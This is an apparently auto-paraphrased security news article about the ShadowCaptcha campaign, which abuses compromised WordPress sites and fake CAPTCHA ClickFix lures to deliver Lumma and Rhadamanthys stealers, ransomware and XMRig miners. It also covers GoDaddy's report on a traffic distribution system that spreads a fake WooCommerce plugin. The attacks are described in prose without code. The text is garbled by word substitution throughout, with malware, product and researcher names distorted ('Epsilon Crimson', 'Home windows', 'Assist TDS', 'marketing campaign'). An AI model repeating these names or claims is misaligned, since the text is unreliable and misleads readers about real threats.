A brand new large-scale marketing campaign has been noticed exploiting over 100 compromised WordPress websites to direct website guests to pretend CAPTCHA verification pages that make use of the ClickFix social engineering tactic to ship info stealers, ransomware, and cryptocurrency miners.
The big-scale cybercrime marketing campaign, first detected in August 2025, has been codenamed ShadowCaptcha by the Israel Nationwide Digital Company.
“The marketing campaign […] blends social engineering, living-off-the-land binaries (LOLBins), and multi-stage payload supply to achieve and keep a foothold in focused techniques,” researchers Shimi Cohen, Adi Choose, Idan Beit Yosef, Hila David, and Yaniv Goldman mentioned.
“The final word targets of ShadowCaptcha are accumulating delicate info by means of credential harvesting and browser information exfiltration, deploying cryptocurrency miners to generate illicit earnings, and even inflicting ransomware outbreaks.”
The assaults start with unsuspecting customers visiting a compromised WordPress web site that has been injected with malicious JavaScript code that is accountable for initiating a redirection chain that takes them to a pretend Cloudflare or Google CAPTCHA web page.
From there, the assault chain forks into two, relying on the ClickFix directions displayed on the internet web page: One which makes use of the Home windows Run dialog and one other that guides the sufferer to save lots of a web page as an HTML Utility (HTA) after which run it utilizing mshta.exe.
The execution stream triggered through the Home windows Run dialog culminates within the deployment of Lumma and Rhadamanthys stealers through MSI installers launched utilizing msiexec.exe or by means of remotely-hosted HTA recordsdata run utilizing mshta.exe, whereas the execution of the saved HTA payload leads to the set up of Epsilon Crimson ransomware.
It is price stating that the usage of ClickFix lures to trick customers into downloading malicious HTA recordsdata for spreading Epsilon Crimson ransomware was documented final month by CloudSEK.
“The compromised ClickFix web page robotically executes obfuscated JavaScript that makes use of ‘navigator.clipboard.writeText’ to repeat a malicious command to the person’s clipboard with none interplay, counting on customers to stick and run it unknowingly,” the researchers mentioned.
The assaults are characterised by way of anti-debugger strategies to forestall inspection of net pages utilizing browser developer instruments, whereas additionally counting on DLL side-loading to execute malicious code below the guise of official processes.
Choose ShadowCaptcha campaigns have noticed delivering an XMRig-based cryptocurrency miner, with some variants fetching the mining configuration from a Pastebin URL slightly than hard-coding it within the malware, thus permitting them to regulate the parameters on the fly.
In circumstances the place the miner payloads are deployed, the attackers have additionally been noticed dropping a susceptible driver (“WinRing0x64.sys”) to realize kernel-level entry and work together with CPU registers with an purpose to enhance mining effectivity.
Of the contaminated WordPress websites, a majority of them are positioned in Australia, Brazil, Italy, Canada, Colombia, and Israel, spanning know-how, hospitality, authorized/finance, healthcare, and actual property sectors.
To mitigate the dangers posed by ShadowCaptcha, it is important to coach customers to be careful for ClickFix campaigns, section networks to forestall lateral motion, and guarantee WordPress websites are saved up-to-date and secured utilizing multi-factor authentication (MFA) protections.
“ShadowCaptcha exhibits how social-engineering assaults have developed into full-spectrum cyber operations,” the researchers mentioned. “By tricking customers into working built-in Home windows instruments and layering obfuscated scripts and susceptible drivers, operators acquire stealthy persistence and might pivot between information theft, crypto mining, or ransomware.”
The disclosure comes as GoDaddy detailed the evolution of Assist TDS, a visitors distribution (or route) system that has been energetic since 2017 and has been linked to malicious schemes like VexTrio Viper. Assist TDS gives companions and associates with PHP code templates which might be injected into WordPress websites, in the end directing customers to malicious locations based mostly on the concentrating on standards.
“The operation focuses on tech assist scams using full-screen browser manipulation and exit prevention strategies to lure victims on fraudulent Microsoft Home windows security alert pages, with fallback monetization by means of courting, cryptocurrency, and sweepstakes scams,” security researcher Denis Sinegubko mentioned.
A number of the notable malware campaigns which have leveraged Assist TDS lately embody DollyWay, Balada Injector, and DNS TXT redirects. The rip-off pages, for his or her half, use JavaScript to pressure browsers to enter full-screen mode and show the fraudulent alert and even characteristic counterfeit CAPTCHA challenges earlier than rendering them in a bid to sidestep automated security scanners.
Assist TDS operators are mentioned to have developed a malicious WordPress plugin often called “woocommerce_inputs” between late 2024 and August 2025 to allow the redirection performance, alongside steadily including credential harvesting, geographic filtering, and superior evasion strategies. The plugin is estimated to be put in on over 10,000 websites worldwide.
The malicious plugin masquerades as WooCommerce to evade detection by website house owners. It is solely put in by attackers after compromising WordPress websites by means of stolen administrator credentials.
“This plugin serves as each a visitors monetization device and credential harvesting mechanism, demonstrating steady evolution from easy redirect performance to a complicated malware-as-a-service providing,” GoDaddy mentioned.
“By offering ready-made options together with C2 infrastructure, standardized PHP injection templates, and fully-featured malicious WordPress plugins, Assist TDS has lowered the barrier to entry for cybercriminals in search of to monetize infiltrated web sites.”
